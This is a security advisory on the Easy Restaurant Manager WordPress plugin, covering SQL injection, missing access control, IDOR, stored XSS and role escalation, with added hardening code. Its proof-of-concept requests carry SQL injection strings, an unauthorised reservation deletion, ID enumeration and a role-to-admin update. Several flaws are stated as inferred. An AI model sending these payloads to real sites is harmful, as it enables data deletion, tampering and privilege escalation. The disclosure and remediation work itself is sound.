@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > WordPress Easy Restaurant Manager Plugin - Multiple Vulnerabilities
.:. Date: April 19, 2025
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://wordpress.org/plugins/easy-restaurant-manager/
.:. Tested Version -> 1.0
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

[+] Vulnerability #1: SQL Injection

Vulnerable Code:
==========================================================================================
public static function store($coupon) {
    return Coupon::store($coupon);
}

public static function updateCoupon($coupon){
    return Coupon::updateCoupon($coupon);
}

public static function deleteCoupon($id){
    return Coupon::deleteCoupon($id);
}

$data = $request->get_param('data');
$id = $data['id'];
==========================================================================================

Issue: These methods in CouponResource.php pass user-controlled input ($coupon, $id) straight through to the model methods without any visible validation or sanitization. The same pattern appears in several other resource classes, including ReservationResource, MenuResource, ColorResource, and TableResource. Note that the snippets above only show the pass-through; whether a request actually reaches the database unescaped depends on how the model methods build their queries (string interpolation versus $wpdb->prepare()), which is not shown here.
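As an added illustration of the pattern this item describes (example code written for this advisory, not the plugin's own model code, which is not shown here), the following puts an assumed unsafe model method next to a hardened one that binds parameters with $wpdb->prepare() and $wpdb->insert(), and registers the route with validation so malformed ids never reach the model. The table name erm_coupons, the allowed discount types, the route callbacks, and the manage_options capability are assumptions; the namespace and paths follow the PoC requests below.

```php
<?php
// Added example, not the plugin's own code. The advisory shows only the
// CouponResource pass-through, not the Coupon model, so the unsafe body below
// is an assumed illustration of the pattern it infers. Table name, allowed
// values, and capability are assumptions.

// Assumed unsafe pattern: the id taken from $request->get_param('data')['id']
// is interpolated into the statement. The PoC value "1 OR 1=1" turns
// "WHERE id = 1 OR 1=1" into "delete every row".
function erm_delete_coupon_unsafe( $id ) {
    global $wpdb;
    $table = $wpdb->prefix . 'erm_coupons'; // assumed table name
    return $wpdb->query( "DELETE FROM {$table} WHERE id = {$id}" );
}

// Hardened: coerce to a positive integer, bind with $wpdb->prepare(), and
// answer a REST-style 400 for anything else.
function erm_delete_coupon_safe( $id ) {
    global $wpdb;
    $id = absint( $id );
    if ( 0 === $id ) {
        return new WP_Error( 'erm_bad_id', 'Invalid coupon id.', array( 'status' => 400 ) );
    }
    $table = $wpdb->prefix . 'erm_coupons';
    $rows  = $wpdb->query( $wpdb->prepare( "DELETE FROM {$table} WHERE id = %d", $id ) );
    return array( 'deleted' => (int) $rows );
}

// Hardened store: $wpdb->insert() escapes every value according to the format
// list, so the PoC1 code "' OR 1=1; -- " is stored as an inert string.
function erm_store_coupon_safe( array $coupon ) {
    global $wpdb;
    $is_date = function ( $v ) {
        return is_string( $v ) && preg_match( '/^\d{4}-\d{2}-\d{2}$/', $v );
    };
    $row = array(
        'name'            => sanitize_text_field( $coupon['name'] ?? '' ),
        'code'            => sanitize_text_field( $coupon['code'] ?? '' ),
        // 'fixed' as the second allowed type is an assumption; only 'percentage' appears in the advisory
        'discount_type'   => ( 'percentage' === ( $coupon['discount_type'] ?? '' ) ) ? 'percentage' : 'fixed',
        'discount_value'  => (float) ( $coupon['discount_value'] ?? 0 ),
        'added_date'      => $is_date( $coupon['added_date'] ?? '' ) ? $coupon['added_date'] : current_time( 'Y-m-d' ),
        'expiration_date' => $is_date( $coupon['expiration_date'] ?? '' ) ? $coupon['expiration_date'] : null,
        'status'          => ( 'active' === ( $coupon['status'] ?? '' ) ) ? 'active' : 'inactive',
    );
    if ( '' === $row['name'] || '' === $row['code'] || null === $row['expiration_date'] ) {
        return new WP_Error( 'erm_bad_coupon', 'Name, code and a YYYY-MM-DD expiration date are required.', array( 'status' => 400 ) );
    }
    $ok = $wpdb->insert( $wpdb->prefix . 'erm_coupons', $row, array( '%s', '%s', '%s', '%f', '%s', '%s', '%s' ) );
    return $ok ? array( 'id' => (int) $wpdb->insert_id ) : new WP_Error( 'erm_db', 'Insert failed.', array( 'status' => 500 ) );
}

// The same checks belong on the route, so bad input is rejected before the
// model sees it. The permission_callback is what the advisory's item #2 says
// is missing; manage_options is an assumed capability.
add_action( 'rest_api_init', function () {
    register_rest_route( 'easy-restaurant-manager/v1', '/coupons', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => function ( WP_REST_Request $request ) {
            return rest_ensure_response( erm_store_coupon_safe( (array) $request->get_json_params() ) );
        },
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
    ) );
    register_rest_route( 'easy-restaurant-manager/v1', '/coupons/(?P<id>\d+)', array(
        'methods'             => WP_REST_Server::DELETABLE,
        'callback'            => function ( WP_REST_Request $request ) {
            return rest_ensure_response( erm_delete_coupon_safe( $request['id'] ) );
        },
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args'                => array(
            'id' => array(
                'required'          => true,
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0; // "1 OR 1=1" is rejected here with a 400
                },
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
} );
```

With this in place the PoC2 body below is rejected by the argument schema before any query runs, and the PoC1 coupon code is inserted as a literal string rather than SQL. If the model keeps building statements by interpolation, the route-level schema alone is not enough; the binding in the model is the actual fix.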
An attacker could exploit this by sending a malicious request to an endpoint that uses these methods:

POC1:

POST /wp-json/easy-restaurant-manager/v1/coupons
Content-Type: application/json

{
  "name": "Discount",
  "code": "' OR 1=1; -- ",
  "discount_type": "percentage",
  "discount_value": "10",
  "added_date": "2025-04-19",
  "expiration_date": "2025-05-19",
  "status": "active"
}

POC2:

POST /wp-json/easy-restaurant-manage/v1/coupon
Content-Type: application/json

{
  "data": {
    "id": "1 OR 1=1"
  }
}

[+] Vulnerability #2: Missing Access Control in Resource Methods

Vulnerable code:
==========================================================================================
public static function getReservation(){
    return Reservation::getReservation();
}

public static function UpdateReservation($id, $status){
    return Reservation::UpdateReservation($id, $status);
}

public static function deleteReservation($id){
    return Reservation::deleteReservation($id);
}
==========================================================================================

Issue: The resource classes show no evidence of authentication or authorization checks before performing sensitive operations on data. These methods in ReservationResource.php read, update, and delete reservations without any visible permission check. If the REST routes that expose them do not enforce access control themselves (in WordPress terms, a permission_callback on the registered route), any caller could read, modify, or delete reservations.
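The following is an added example (written for this advisory, not the plugin's own code) of what the missing checks look like on the reservation routes: a permission_callback on every method of the route, which WordPress runs before the handler, plus an ownership check on the reservation named by the id. The second half is the same control the IDOR item (#3) further down needs, since a caller who can only act on their own rows gains nothing by walking ids. The erm_reservations table, its user_id column, the status set, and the manage_options capability are assumptions.

```php
<?php
// Added example, not the plugin's own code. It supplies the two checks the
// advisory finds missing: a permission_callback on the route (item #2) and an
// ownership check on the object named by the id (item #3). Table name,
// user_id column, status values, and capability are assumptions.

function erm_get_reservation( $id ) {
    global $wpdb;
    $table = $wpdb->prefix . 'erm_reservations'; // assumed
    return $wpdb->get_row(
        $wpdb->prepare( "SELECT id, user_id, status FROM {$table} WHERE id = %d", absint( $id ) ),
        ARRAY_A
    );
}

// Authorization decision in one place: managers may act on any reservation,
// everyone else only on their own. A row that does not exist is treated as
// "not yours", so the response does not reveal whether the id is in use.
function erm_can_manage_reservation( $id, $user_id = 0 ) {
    if ( current_user_can( 'manage_options' ) ) {
        return true;
    }
    $user_id = $user_id ?: get_current_user_id();
    if ( ! $user_id ) {
        return false; // anonymous callers get nothing
    }
    $row = erm_get_reservation( $id );
    return $row && (int) $row['user_id'] === (int) $user_id;
}

function erm_update_reservation_status( $id, $status ) {
    global $wpdb;
    $allowed = array( 'pending', 'confirmed', 'cancelled' ); // assumed status set
    if ( ! in_array( $status, $allowed, true ) ) {
        return new WP_Error( 'erm_bad_status', 'Unknown status.', array( 'status' => 400 ) );
    }
    $wpdb->update(
        $wpdb->prefix . 'erm_reservations',
        array( 'status' => $status ),
        array( 'id' => absint( $id ) ),
        array( '%s' ),
        array( '%d' )
    );
    return erm_get_reservation( $id );
}

add_action( 'rest_api_init', function () {
    // One callback for every method: the REST server runs it before the
    // handler and answers 401 (anonymous) or 403 (logged in) when it returns false.
    $owner_or_manager = function ( WP_REST_Request $request ) {
        return erm_can_manage_reservation( $request['id'] );
    };

    register_rest_route( 'easy-restaurant-manager/v1', '/reservations/(?P<id>\d+)', array(
        array(
            'methods'             => WP_REST_Server::READABLE,
            'permission_callback' => $owner_or_manager,
            'callback'            => function ( WP_REST_Request $request ) {
                return rest_ensure_response( erm_get_reservation( $request['id'] ) );
            },
        ),
        array(
            'methods'             => WP_REST_Server::EDITABLE,
            'permission_callback' => $owner_or_manager,
            'callback'            => function ( WP_REST_Request $request ) {
                return rest_ensure_response(
                    erm_update_reservation_status( $request['id'], (string) $request->get_param( 'status' ) )
                );
            },
        ),
        array(
            'methods'             => WP_REST_Server::DELETABLE,
            'permission_callback' => $owner_or_manager,
            'callback'            => function ( WP_REST_Request $request ) {
                global $wpdb;
                $rows = $wpdb->delete( $wpdb->prefix . 'erm_reservations', array( 'id' => absint( $request['id'] ) ), array( '%d' ) );
                return rest_ensure_response( array( 'deleted' => (int) $rows ) );
            },
        ),
    ) );
} );
```

Two practical notes. Cookie-authenticated callers must send a valid X-WP-Nonce (wp_rest action) or WordPress treats the request as anonymous, so the check above fails closed. And because ownership is decided from the stored row rather than from anything in the request, the DELETE /reservations/123 PoC below returns rest_forbidden unless the caller is a manager or actually owns reservation 123.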
POC: An attacker could attempt to read or modify reservations belonging to other users by manipulating request parameters:

DELETE /wp-json/easy-restaurant-manager/v1/reservations/123

Without proper authorization checks, this could delete any reservation in the system, regardless of whether it belongs to the current user.

[+] Vulnerability #3: Insecure Direct Object References (IDOR)

Vulnerable code:
==========================================================================================
public static function deleteMenu($id){
    return Menu::deleteMenu($id);
}
==========================================================================================

Issue: This method in MenuResource.php potentially allows access to any menu item by its ID. Without an ownership or capability check tied to the id, an attacker can simply increment or modify ID values to reach resources belonging to other users or branches. By manipulating ID parameters in requests, an attacker could enumerate resources they are not authorized to see:

POC:

GET /wp-json/easy-restaurant-manager/v1/tables/5
GET /wp-json/easy-restaurant-manager/v1/tables/6
GET /wp-json/easy-restaurant-manager/v1/tables/7

[+] Vulnerability #4: Stored XSS

Vulnerable code:
==========================================================================================
public static function getTemplateSettings() {
    return get_option('easy_restaurant_manger_menus_template_settings', [
        'primary_color'       => '#3498F5',
        'secondary_color'     => '#6B3CEB',
        'background_color'    => '#fff',
        'font_color'          => '#253241',
        'template'            => 'classic',
        'menu_single_page'    => 'yes',
        'category_title'      => 'OUR SPECIAL MENU',
        'category_short_desc' => 'Enjoy the unique dishes from the best/elite restaurant that only our restaurant has. Fusce malesuada, lorem vitae euismod lobortis.',
        'menus_title'         => 'Menus',
        'menus_short_desc'    => 'Enjoy the unique dishes from the best/elite restaurant that only our restaurant has. Fusce malesuada, lorem vitae euismod lobortis.',
    ]);
}
==========================================================================================

Issue: The ColorResource class handles the template settings that the front end renders. A user who can update these settings can store JavaScript in them, because the input is saved as-is and later output without proper escaping. Note that the code shown above only reads the option and supplies defaults; the missing sanitization and escaping lie on the save and render paths. An attacker could update color settings or descriptions with malicious JavaScript:

POC:

POST /wp-json/easy-restaurant-manager/v1/settings
Content-Type: application/json

{
  "category_short_desc": ""
}

[+] Vulnerability #5: Custom User Management Vulnerabilities

Code:
==========================================================================================
$sql = "CREATE TABLE IF NOT EXISTS `{$wpdb->prefix}erm_users` (
    id INT PRIMARY KEY AUTO_INCREMENT,
    branch_id INT DEFAULT NULL,
    name VARCHAR(255) NOT NULL,
    email VARCHAR(255) UNIQUE NOT NULL,
    phone VARCHAR(20) NOT NULL,
    password VARCHAR(255) NOT NULL,
    role ENUM('customer', 'admin', 'manager') NOT NULL DEFAULT 'customer',
    loyalty_points INT DEFAULT 0,
    created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
    updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) $charset_collate;";
==========================================================================================

Issue: The plugin implements its own user management system rather than leveraging WordPress's built-in users, roles, and capabilities. This custom implementation stores passwords and handles user roles separately from WordPress.
Without seeing the implementation details, this raises concerns about password storage (hashing algorithm and salting), session management, and privilege escalation between the custom roles (customer, manager, admin). If the plugin does not properly validate role changes, an attacker might exploit this to gain elevated privileges, for example:

PUT /wp-json/easy-restaurant-manager/v1/users/profile
Content-Type: application/json

{
  "role": "admin"
}

Timeline:
2025-04-01: Initial discovery
2025-04-08: Vendor notification
2025-04-12: Follow-up (no response)
2025-04-19: Coordinated disclosure
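Added remediation example for item #4 (stored XSS), written for this advisory rather than taken from the plugin: the template settings are sanitized to their expected shape on save and escaped for the specific output context on render, using the option name and default keys from the getTemplateSettings() snippet above. The /settings route handler, the manage_options capability, the set of known templates, and the render markup are assumptions.

```php
<?php
// Added example, not the plugin's own code. Item #4 stores the template
// settings in the easy_restaurant_manger_menus_template_settings option and
// renders them on the front end. Two things are needed: sanitize to the
// expected shape on save, and escape for the exact output context on render.
// The /settings route, the capability, and the render markup are assumptions.

// Inline markup allowed in the two description fields: no <script>, no on*
// attributes, and wp_kses() also strips javascript: URLs from href.
function erm_allowed_desc_html() {
    return array(
        'strong' => array(),
        'em'     => array(),
        'br'     => array(),
        'a'      => array( 'href' => array(), 'title' => array() ),
    );
}

// Same rule as WordPress's sanitize_hex_color(): "#rgb" or "#rrggbb" only.
function erm_hex_color_or( $value, $default ) {
    return ( is_string( $value ) && preg_match( '/^#([A-Fa-f0-9]{3}){1,2}$/', $value ) ) ? $value : $default;
}

// Sanitize on save: every key has exactly one accepted shape, unknown keys
// are dropped, and anything malformed falls back to the plugin's default.
function erm_sanitize_template_settings( array $input ) {
    $defaults = array(
        'primary_color'       => '#3498F5',
        'secondary_color'     => '#6B3CEB',
        'background_color'    => '#fff',
        'font_color'          => '#253241',
        'template'            => 'classic',
        'menu_single_page'    => 'yes',
        'category_title'      => 'OUR SPECIAL MENU',
        'category_short_desc' => '',
        'menus_title'         => 'Menus',
        'menus_short_desc'    => '',
    );
    $out = array();
    foreach ( $defaults as $key => $default ) {
        $value = $input[ $key ] ?? $default;
        switch ( $key ) {
            case 'primary_color':
            case 'secondary_color':
            case 'background_color':
            case 'font_color':
                $out[ $key ] = erm_hex_color_or( $value, $default );
                break;
            case 'template':
                $out[ $key ] = in_array( $value, array( 'classic' ), true ) ? $value : $default; // known templates assumed
                break;
            case 'menu_single_page':
                $out[ $key ] = ( 'yes' === $value ) ? 'yes' : 'no';
                break;
            case 'category_short_desc':
            case 'menus_short_desc':
                $out[ $key ] = wp_kses( (string) $value, erm_allowed_desc_html() );
                break;
            default:
                $out[ $key ] = sanitize_text_field( (string) $value );
        }
    }
    return $out;
}

// Escape on render: the destination decides the escaper. Colours are already
// constrained to hex by the sanitizer (esc_attr() is belt and braces), titles
// go through esc_html(), and the rich-text descriptions go back through
// wp_kses() with the same allow list in case the option was written by
// another path.
function erm_render_menu_header( array $s ) {
    $html  = '<style>.erm-menu{color:' . esc_attr( $s['font_color'] ) . ';background:' . esc_attr( $s['background_color'] ) . '}</style>';
    $html .= '<h2 class="erm-menu">' . esc_html( $s['category_title'] ) . '</h2>';
    $html .= '<p class="erm-menu">' . wp_kses( $s['category_short_desc'], erm_allowed_desc_html() ) . '</p>';
    return $html;
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'easy-restaurant-manager/v1', '/settings', array(
        'methods'             => WP_REST_Server::EDITABLE,
        'callback'            => function ( WP_REST_Request $request ) {
            $clean = erm_sanitize_template_settings( (array) $request->get_json_params() );
            update_option( 'easy_restaurant_manger_menus_template_settings', $clean );
            return rest_ensure_response( $clean );
        },
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
    ) );
} );
```

Sanitizing on save is not a substitute for escaping on render: the option can be written by other code paths, and the escaper has to match where the value lands (a style block, an attribute, element text). Doing both, with the same allow list on both sides for the rich-text fields, is what closes the stored XSS described in item #4.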